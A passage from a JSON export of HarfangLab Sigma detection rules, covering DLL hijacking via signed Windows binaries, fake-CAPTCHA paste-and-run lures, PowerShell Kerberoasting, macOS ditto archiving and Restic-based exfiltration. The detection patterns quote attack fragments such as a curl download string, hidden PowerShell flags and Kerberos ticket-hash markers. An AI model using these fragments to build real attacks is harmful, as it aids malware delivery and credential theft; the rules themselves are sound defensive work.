"content": "title: DLL Hijacking via wimserv.exe\nid: a0466fa2-bd36-4417-8ffc-f643d82c590d\ndescription: |\n Detects potential Windows DLL Hijacking via wimserv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wimserv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0466fa2-bd36-4417-8ffc-f643d82c590d",
"rule_name": "DLL Hijacking via wimserv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wimserv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a05613da-3d11-40bc-aeee-449f421ee503",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602077Z",
"creation_date": "2026-03-23T11:45:34.602080Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602088Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_unregmp2.yml",
"content": "title: DLL Hijacking via unregmp2.exe\nid: a05613da-3d11-40bc-aeee-449f421ee503\ndescription: |\n Detects potential Windows DLL Hijacking via unregmp2.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'unregmp2.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a05613da-3d11-40bc-aeee-449f421ee503",
"rule_name": "DLL Hijacking via unregmp2.exe",
"rule_description": "Detects potential Windows DLL Hijacking via unregmp2.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a07274ba-e853-4ac9-b887-bc07d56cd242",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623523Z",
"creation_date": "2026-03-23T11:45:34.623525Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623530Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha",
"https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/",
"https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/004/"
],
"name": "t1204_001_fake_captcha_exploitation.yml",
"content": "title: Fake Captcha Exploitation Detected\nid: a07274ba-e853-4ac9-b887-bc07d56cd242\ndescription: |\n Detects a suspicious command related to fake Captchas.\n Attackers use fake Captcha verification pages to trick users into executing a malicious payload by asking them to open and copy paste malicious code into a terminal.\n This technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\n It is recommended to investigate the command to determine its legitimacy.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha\n - https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/\n - https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/004/\ndate: 2025/01/06\nmodified: 2026/01/30\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\mshta.exe'\n ParentImage|endswith: '\\explorer.exe'\n\n selection_cmd1:\n CommandLine|contains|all:\n - 'am'\n # same with \\xce\\x99 for 'I' and \\xce\\xbf for 'o' , resembling unicode characters\n - 'n?t'\n - 'r?b?t'\n\n selection_cmd2:\n CommandLine|contains:\n - 'CAPTCHA'\n - 'Cl?udflare'\n - 'Verification'\n\n selection_cmd3:\n CommandLine|contains: ' && curl.exe --proto-default httP -L -o '\n\n 
selection_powershell:\n CommandLine|contains|all:\n - 'PowerShell.exe -W Hidden -C'\n - 'New-Object -ComObject'\n - 'Service connection checkup'\n\n condition: selection_image and (all of selection_cmd* or selection_powershell)\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a07274ba-e853-4ac9-b887-bc07d56cd242",
"rule_name": "Fake Captcha Exploitation Detected",
"rule_description": "Detects a suspicious command related to fake Captchas.\nAttackers use fake Captcha verification pages to trick users into executing a malicious payload by asking them to open and copy paste malicious code into a terminal.\nThis technique is often used to deliver Lumma Stealer, an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022.\nIt is recommended to investigate the command to determine its legitimacy.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2026-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.004",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0999f7b-2f2f-4335-a5e2-f5e5af84382a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085309Z",
"creation_date": "2026-03-23T11:45:34.085311Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085316Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/",
"https://asiapacificdefencereporter.com/wp-content/uploads/2023/08/Final-CRWD-2023-Threat-Hunting-Report.pdf",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_kerberoasting_attempt_detected.yml",
"content": "title: Kerberoasting Attempt Detected via PowerShell\nid: a0999f7b-2f2f-4335-a5e2-f5e5af84382a\ndescription: |\n Detects the use of PowerShell to perform Kerberoasting by enumerating user accounts with SPNs and requesting Kerberos TGS tickets.\n The tickets are then extracted and formatted for offline password cracking.\n This behavior is commonly associated with lateral movement or privilege escalation attempts.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://www.vaadata.com/blog/what-is-kerberoasting-attack-and-security-tips-explained/\n - https://asiapacificdefencereporter.com/wp-content/uploads/2023/08/Final-CRWD-2023-Threat-Hunting-Report.pdf\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/07/10\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - '[ADSI]'\n - 'System.IdentityModel.Tokens.KerberosRequestorSecurityToken'\n - '^(.*?)04820...(.*)'\n - '$krb5tgs$23$*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0999f7b-2f2f-4335-a5e2-f5e5af84382a",
"rule_name": "Kerberoasting Attempt Detected via PowerShell",
"rule_description": "Detects the use of PowerShell to perform Kerberoasting by enumerating user accounts with SPNs and requesting Kerberos TGS tickets.\nThe tickets are then extracted and formatted for offline password cracking.\nThis behavior is commonly associated with lateral movement or privilege escalation attempts.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2022-07-10",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0c5d981-479e-44e7-b5e2-ae6124aa529e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618495Z",
"creation_date": "2026-03-23T11:45:34.618497Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618501Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_ditto_archive_creation_file.yml",
"content": "title: Archive Created via ditto in a Suspicious Folder\nid: a0c5d981-479e-44e7-b5e2-ae6124aa529e\ndescription: |\n Detects archive creation using ditto in a folder commonly used by malicious code.\n Adversaries may compress and/or encrypt collected data prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution and the content of the archive.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/06/13\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.Ditto\n - classification.macOS.Behavior.Collection\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/ditto'\n ProcessCommandLine|contains: ' -c '\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp/'\n - '/private/tmp/'\n Kind: 'create'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0c5d981-479e-44e7-b5e2-ae6124aa529e",
"rule_name": "Archive Created via ditto in a Suspicious Folder",
"rule_description": "Detects archive creation using ditto in a folder commonly used by malicious code.\nAdversaries may compress and/or encrypt collected data prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution and the content of the archive.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-04-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a0c89315-2c0d-447a-b0e8-2ea3aac36e0c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590062Z",
"creation_date": "2026-03-23T11:45:34.590066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590073Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msteams.yml",
"content": "title: DLL Hijacking via msteams.exe\nid: a0c89315-2c0d-447a-b0e8-2ea3aac36e0c\ndescription: |\n Detects potential Windows DLL Hijacking via msteams.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msteams.exe'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a0c89315-2c0d-447a-b0e8-2ea3aac36e0c",
"rule_name": "DLL Hijacking via msteams.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msteams.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a129d6b7-a21b-4e9f-95d8-ce1287f25e1f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602268Z",
"creation_date": "2026-03-23T11:45:34.602272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602279Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_printfilterpipelinesvc.yml",
"content": "title: DLL Hijacking via PrintFilterPipelineSvc.exe\nid: a129d6b7-a21b-4e9f-95d8-ce1287f25e1f\ndescription: |\n Detects potential Windows DLL Hijacking via PrintFilterPipelineSvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PrintFilterPipelineSvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\powrprof.dll'\n - '\\prntvpt.dll'\n - '\\xpsservices.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a129d6b7-a21b-4e9f-95d8-ce1287f25e1f",
"rule_name": "DLL Hijacking via PrintFilterPipelineSvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PrintFilterPipelineSvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a135187d-5339-40eb-a24b-1539ac6df95b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077265Z",
"creation_date": "2026-03-23T11:45:34.077267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077271Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_exfiltration_through_restic.yml",
"content": "title: Data Possibly Exfiltrated via Restic Backup Tool\nid: a135187d-5339-40eb-a24b-1539ac6df95b\ndescription: |\n Detects a Restic command-line used to back up data to a remote repository (sftp, rest, s3, swift, b2, azure, gs or rclone backend) whose target is not a loopback, RFC1918 private or 192.0.0.0/24 address.\n This technique can be used by attackers to exfiltrate data from an infected system quietly by using a legitimate backup tool.\n Restic usage was spotted during a Nitrogen malware campaign used by ALPHV Ransomware affiliates.\n It is recommended to check if this backup is recurrent and legitimate.\n Note that the private-address filters are plain substring matches on the command line, so a public destination whose address contains one of those prefixes as a later octet (e.g. 203.0.127.5 contains '127.') will be suppressed; review such command lines manually.\nreferences:\n - https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/12/13\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Restic\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_backup:\n Image|endswith:\n - '\\Restic.exe'\n - '\\restic_*.exe'\n CommandLine|contains: 'backup'\n\n selection_remote:\n CommandLine|contains:\n - '-r'\n - '--repo'\n\n selection_protocol:\n CommandLine|contains:\n - 'sftp:'\n - 'rest:'\n - 's3:'\n - 'swift:'\n - 'b2:'\n - 'azure:'\n - 'gs:'\n - 'rclone:'\n\n filter_local_ip:\n # NOTE: bare substring matches on the whole command line; a public address such as 203.0.127.5 also contains '127.' and would be filtered out.\n CommandLine|contains:\n - '127.' # RFC1122\n - '192.168.' # RFC1918\n - '192.0.0.' # RFC5736\n - '172.16.' # RFC1918\n - '172.17.' # RFC1918\n - '172.18.' # RFC1918\n - '172.19.' # RFC1918\n - '172.2?.' # RFC1918\n - '172.30.' # RFC1918\n - '172.31.' # RFC1918\n - '://10.' # RFC1918, :// avoid matching product versions and such.\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a135187d-5339-40eb-a24b-1539ac6df95b",
"rule_name": "Data Possibly Exfiltrated via Restic Backup Tool",
"rule_description": "Detects a Restic command-line used to back up data to a remote repository (sftp, rest, s3, swift, b2, azure, gs or rclone backend) whose target is not a loopback, RFC1918 private or 192.0.0.0/24 address.\nThis technique can be used by attackers to exfiltrate data from an infected system quietly by using a legitimate backup tool.\nRestic usage was spotted during a Nitrogen malware campaign used by ALPHV Ransomware affiliates.\nIt is recommended to check if this backup is recurrent and legitimate.\nNote that the private-address filters are plain substring matches on the command line, so a public destination whose address contains one of those prefixes as a later octet (e.g. 203.0.127.5 contains '127.') will be suppressed; review such command lines manually.\n",
"rule_creation_date": "2023-12-13",
